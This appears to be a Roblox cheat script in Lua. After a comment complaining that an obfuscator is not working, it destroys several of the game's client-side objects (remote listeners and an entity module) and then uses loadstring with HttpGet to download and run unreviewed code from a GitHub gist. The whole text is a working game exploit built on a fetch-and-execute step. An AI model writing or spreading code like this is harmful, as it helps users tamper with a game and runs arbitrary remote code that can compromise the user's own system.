--obfuscator slave isn't working :(
game.Players.LocalPlayer.PlayerGui.MainUI.Initiator.Main_Game.RemoteListener:destroy()
game.StarterGui.MainUI.Initiator.Main_Game.RemoteListener:destroy()
game.ReplicatedStorage.ClientModules.EntityModules.Void:destroy()\
wait(1)
loadstring(game:HttpGet("https://gist.githubusercontent.com/Ginxys/dd9a0fc6020dbbd4f841a9d9af71926e/raw/24b01953f2c9a2eae955320c962ae88013e7bc93/ffefwe"))()
